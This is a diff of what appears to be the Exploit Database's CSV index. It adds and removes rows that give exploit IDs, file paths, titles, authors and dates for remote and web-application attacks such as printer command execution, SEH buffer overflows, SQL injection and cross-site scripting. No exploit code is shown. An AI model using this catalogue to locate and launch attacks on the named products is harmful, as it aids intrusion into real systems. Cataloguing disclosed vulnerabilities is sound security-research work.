 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
-44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 44950,exploits/unix/remote/44950.rb,"Quest KACE Systems Management - Command Injection (Metasploit)",2018-06-27,Metasploit,remote,unix,
@@ -16749,6 +16746,7 @@ id,file,description,date,author,type,platform,port
 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
 45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
+45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,
 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
@@ -16763,6 +16761,7 @@ id,file,description,date,author,type,platform,port
 45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux,
 45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple,
 45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
+45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86,
 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
@@ -39583,7 +39582,6 @@ id,file,description,date,author,type,platform,port
 44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community 2.2.0 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
 44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
 44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
-44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
 44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,
 44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
@@ -39667,7 +39665,7 @@ id,file,description,date,author,type,platform,port
 44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
 44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,
 44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,
-44747,exploits/java/webapps/44747.txt,"OpenDaylight - SQL Injection",2018-05-24,JameelNabbo,webapps,java,
+45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware,
 44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
 44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
 44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux,
@@ -39699,7 +39697,6 @@ id,file,description,date,author,type,platform,port
 44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
 44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
 44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php,
-44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
 44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
 44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
 44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,